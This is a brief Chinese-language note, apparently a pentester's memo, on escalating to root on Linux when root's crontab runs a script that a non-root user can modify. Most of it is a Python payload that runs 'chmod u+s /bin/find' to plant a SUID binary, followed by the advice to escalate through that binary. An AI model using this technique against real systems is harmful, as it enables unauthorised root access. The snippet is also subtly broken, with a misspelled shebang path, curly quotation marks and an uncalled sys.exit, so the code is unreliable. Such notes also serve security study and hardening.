refer to:
https://juejin.cn/post/7166171652764467231
前提:
1. root执行了crontab
2. 该 crontab 任务是执行一个脚本,例如: * * * * * run my.py
思路
只要非root用户,具备修改my.py文件的内容,就可以达到拿到root的效果:
例如,非root用户,修改my.py:
#!/user/bin/env python
import os
import sys
try:
os.system(‘chmod u+s /bin/find’)
except:
sys.exit
这样,我们就为 /bin/find 加上了suid,
接下来就可以正常通过suid的方式来提权了